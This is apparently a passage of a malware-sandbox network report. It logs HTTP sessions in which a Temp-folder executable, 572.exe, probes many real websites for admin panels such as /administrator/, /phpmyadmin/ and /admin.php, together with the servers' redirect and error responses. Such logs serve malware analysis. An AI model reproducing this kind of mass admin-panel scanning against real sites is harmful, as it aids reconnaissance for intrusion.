                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                183192.168.2.655275164.100.213.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.111188889 CET174OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.509741068 CET142INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.657315016 CET183OUTGET /administrator/index.php HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:59.058114052 CET151INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                184192.168.2.655269202.81.112.3280524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.191092968 CET186OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: testconnect.garena.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.507335901 CET360INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://testconnect.garena.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                185192.168.2.655581172.66.43.6480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.248572111 CET184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.380322933 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kUQx2bPKD6Q8B4mYJoXNgGMvD%2BUbPboVXzm3qK2TBYFIUSGoPxAn5ItW7xWZ7V2E98vveF%2FVqnmdSwHs2ftsFer1TrJAPLP8tJyP3LESiunzVp%2BSrBzR1ZT4CRmCnjyI9p%2BxDNgO04YG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6eab8c0725-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 92 bd b7 7b 49 1d 59 c5 75 37 05 02 6c 71 db db 2c da c5 61 11 50 e4 c8 e2 85 22 75 24 65 c5 48 f3 dd 0b 8a 92 2d ff 48 ae 8b 16 08 10 51 1c be 99 79 7c 33 22 9d 9c 7d f8 f9 fd dd d7 4f 37 50 d8 52 a4 a3 e4 2c 0c 7f e5 39 08 0b b7 37 70 f9 2d 85 c4 4d 00 15 c4 98 65 20 55 f8 9b 01 8e 3f 82 12 8c 63 00 82 c8 d5 32 40 19 7e f9 1c a4 90 9c fd 8a 92 f1 fc 5b 18 ee a0 3a 1c 80 d3 50 97 df 07 75 f5 0a d4 d5 77 40 ad 6c 87 e6 5e 9c ca f2 18 25 0c f7 91 0a 24 2c 1d 25 96 5b 81 e9 4f d6 a2 b4 5c 49 f8 05 7f af b9 46 76 06 ff 86 f7 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 65 f0 e5 ee 6f e1 55 00 71 3f 51 58 5b 85 0e 61 bd 0c de 2b e9 40 c3 bb 4d 85 01 50 3f 5a 06 16 1f 6d ec e2 bd de c2 bc 86 f2 af f0 cb 4f e1 7b 55 56 c4 f2 4c 0c 81 6e 6f 96 37 6c 85 83 75 92 94 b8 0c b4 ca 94 35 03 43 a9 b8 64 f8 38 05 a9 72 25 84 6a 8e 96 ac 39 36 95 d2 76 b0 a8 e1 cc 16 4b 86 6b 4e 31 6c 07 53 2e b9 e5 44 84 86 12 81 cb b9 47 11 5c 3e 80 46 b1 0c 8c dd 08 34 05 a2 0d 80 b3 65 40 f3 7b ff 2a a4 c6 04 50 68 cc 97 41 4c 99 0c e9 8a c7 7e 2a a6 79 84 5a 2b 6d a2 d6 28 3e d4 f0 9f bf a5 2f bb b8 d8 b9 e0 e8 bc 5c fc a1 17 8e bd a3 7d 35 b4 86 69 a6 d8 e6 a9 24 7a c5 e5 62 76 5d 11 c6 b8 5c 2d 66 cf 89 07 4a 47 a3 81 02 d1 c5 37 9f 75 1a 1c 25 86 6a 5e d9 74 04 c0 73 18 9f 49 b2 e6 2b 62 95 8e a8 52 0f 1c 6f 24 c9 04 b2 09 3c 8d 5c 09 34 5c 32 d5 44 84 b1 9b 35 4a fb 91 1b 8b 12 f5 f8 e2 c3 cf 7f ef 94 f3 51 11 86 ec 62 0a 79 2d 69 2b ce 71 bf 1a 60 4d 34 74 c0 02 96 c0 14 ad 4b 94 36 5a a1 bd 11 e8 1e ff ba b9 65 e3 0b 6f 13 12 81 da 5e 4c ae bb d5 fd ca a8 cd 2b 62 dc 54 82 6c 60 09 17 99 50 f4 e1 c2 db 3d 4f 46 00 cf
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c7XobX{IYu7lq,aP"u$eH-HQy|3"}O7PR,97p-Me U?c2@~[:Puw@l^%$,%[O\IFvB,Dc{QR%@eoUq?QX[a+@MP?ZmO{UVLno7lu5Cd8r%j96vKkN1lS.DG\>F4e@{*PhAL~*yZ+m(>/\}5i$zbv]\-fJG7u%j^tsI+bRo$<\4\2D5JQby-i+q`M4tK6Zeo^L+bTl`P=OF
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.380342007 CET1167INData Raw: a3 24 ee 53 3b aa a2 d1 28 89 bb 42 72 dc b9 e4 13 c6 d7 dd fe 87 8d 26 55 85 3a 48 5b b8 76 a6 2b 52 9a fb 90 a0 7f 08 db 0d 72 c3 2e e2 76 dc 29 69 90 43 00 8c 58 12 5a 4d a4 11 c4 a2 2b 71 47 ec bd 37 32 41 fa 49 20 31 08 fe 75 97 a9 89 92 98
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: $S;(Br&U:H[v+Rr.v)iCXZM+qG72AI 1u .K.\l8H(nEOAQ.uo~DK[, Laj(!C!Kb>D{3$1GjUR4&HF3`$v)ZFTI\rDq%$II|U*F
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.380356073 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                186192.168.2.655592104.17.62.5080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.248578072 CET180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.388902903 CET757INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.faceit.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=XADvHeTblGnYAGH5fIY149VZt8m2ojLLVvWNRWV5PEY-1707131691-1-AW4ra6nKl8YPs+tgZqSbCuwal1thAH42pB7/z0iOdlBXcgmv/52/fUknG1tJYcZ0O07uxq3B3nrVo0V7crTY+5/Fy5nkTq5CSbKEBxnhxtYb; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.faceit.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=AYLGosTwxbApeH3ZOQC199phYszxhU1LIj5LcmeqBdU-1707131691323-0-604800000; path=/; domain=.faceit.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6ead9ab175-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                187192.168.2.655671104.26.8.1780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.281136036 CET168OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.410614014 CET679INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://rage.mp/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P23TM8PM60mHXLkCLfKRJ7c0Zr8KMd3RHlIrxfnxdnz99p2drQClGn9HqBZNdmpQqgWZDIrHU4854nGcY1WzxzTjAu9qStt6sLzETeQ3GhfTSYG4YWr2xjA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6edb0253f6-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                188192.168.2.65564131.13.65.780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.294739008 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.396543980 CET217INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710078001 CET217INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.909635067 CET192OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.011698008 CET226INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                189192.168.2.655643184.25.164.10380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.294740915 CET186OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.470642090 CET351INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.090513945 CET195OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:00.268906116 CET360INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                190192.168.2.655644142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.295103073 CET178OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.419626951 CET483INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.419642925 CET182INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 31 41 63 a1 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 cd db 86 26 a4 66 79 19 06 bf f3 86 d1 d6 be d4 00 b8 32 ce ae 62 9d e6 37 c1 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHIkA$b01Ac,;;oI&fy2b7CB/Xtkt}OU=xXQM7Z-6`bYA.)B,3-iV"8(P1'


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                191192.168.2.65564931.13.88.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.297002077 CET182OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.398838043 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.707858086 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.366786003 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468625069 CET220INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                192192.168.2.655706172.67.148.12480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.300585985 CET168OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: loopex.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
